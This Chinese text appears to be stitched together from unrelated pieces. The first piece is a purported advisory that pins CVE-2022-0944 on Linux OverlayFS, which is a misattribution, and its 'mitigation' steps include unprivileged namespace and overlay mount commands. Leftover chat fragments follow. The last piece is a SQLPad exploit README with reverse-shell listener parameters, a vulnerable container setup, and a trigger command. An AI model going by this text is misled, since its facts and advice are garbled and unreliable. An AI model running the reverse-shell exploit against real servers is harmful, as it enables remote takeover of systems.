Linux 内核 OverlayFS 子系统权限提升漏洞的安全公告与缓解指南。
CVE-2022-0944 是 Linux 内核 OverlayFS 子系统中的一个安全漏洞,允许本地攻击者通过特定配置中对文件创建的不当处理来提升权限。

本地攻击者可:
检查内核版本
uname -r
验证 OverlayFS 使用情况
mount | grep overlay
检查安全公告
# 对于 Debian/Ubuntu:
grep CVE-2022-0944 /var/log/apt/history.log
# 对于 RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
更新至以下已修补版本之一:
更新命令:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
# RHEL/CentOS
sudo yum update kernel
限制 OverlayFS 使用:
sudo modprobe -r overlay
实施命名空间限制:
# 创建非特权用户命名空间
unshare -Ur
# 使用用户限制挂载
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
应用 SELinux/AppArmor 策略:
type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
本文档仅供参考。尽管已尽力确保准确性,但不提供任何保证。在生产环境部署前,请务必在开发环境中测试补丁。
最后更新: 2023-10-01 | 查看更新日志
本 README 格式适用于:
是否需要我:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url SQLPad 的 URL
lhost 用于反向 Shell 的监听主机地址
lport 用于反向 Shell 的监听端口
username 登录用户名(可选)
password 登录密码(可选)
options:
-h, --help 显示此帮助信息并退出
示例:
# 安装依赖
pip install -r requirements.txt
# 启动 SQLPad Docker 容器
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# 触发漏洞利用
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
此仓库包含的代码和工具仅用于教育目的,特别是用于网络安全课程和学习环境。代码作者对因使用、滥用或修改此代码而产生的任何后果不承担任何责任。该代码按“原样”提供,不附带任何明示或暗示的保证,包括但不限于对适销性或特定用途适用性的暗示保证。